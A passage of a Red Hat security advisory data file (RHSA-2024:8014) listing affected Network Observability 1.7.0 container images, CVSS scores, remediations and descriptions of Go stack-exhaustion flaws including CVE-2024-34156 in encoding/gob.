"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 5.9, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion", }, { cve: "CVE-2024-34156", cwe: { id: "CWE-674", name: "Uncontrolled Recursion", }, discovery_date: "2024-09-06T21:20:09.377905+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2310528", }, ], notes: [ { category: "description", text: "A flaw was found in the encoding/gob package of the Golang standard library. Calling Decoder.Decoding, a message that contains deeply nested structures, can cause a panic due to stack exhaustion. This is a follow-up to CVE-2022-30635.", title: "Vulnerability description", }, { category: "summary", text: "encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion", title: "Vulnerability summary", }, { category: "other", text: "This vulnerability in Go's `encoding/gob` package is of high severity because it exposes applications to potential Denial of Service (DoS) attacks through stack exhaustion. Since `gob` relies on recursive function calls to decode nested structures, an attacker could exploit this by sending crafted messages with excessively deep nesting, causing the application to panic due to stack overflow. This risk is particularly important in scenarios where untrusted or external input is processed, as it can lead to system unavailability or crashes, undermining the reliability and availability of services.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-34156", }, { category: "external", summary: "RHBZ#2310528", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310528", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-34156", url: "https://www.cve.org/CVERecord?id=CVE-2024-34156", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-34156", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-34156", }, { category: "external", summary: "https://go.dev/cl/611239", url: "https://go.dev/cl/611239", }, { category: "external", summary: "https://go.dev/issue/69139", url: "https://go.dev/issue/69139", }, { category: "external", summary: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", url: "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk", }, { category: "external", summary: "https://pkg.go.dev/vuln/GO-2024-3106", url: "https://pkg.go.dev/vuln/GO-2024-3106", }, ], release_date: "2024-09-06T21:15:12.020000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-22T01:05:39+00:00", details: "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8014", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le", "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64", 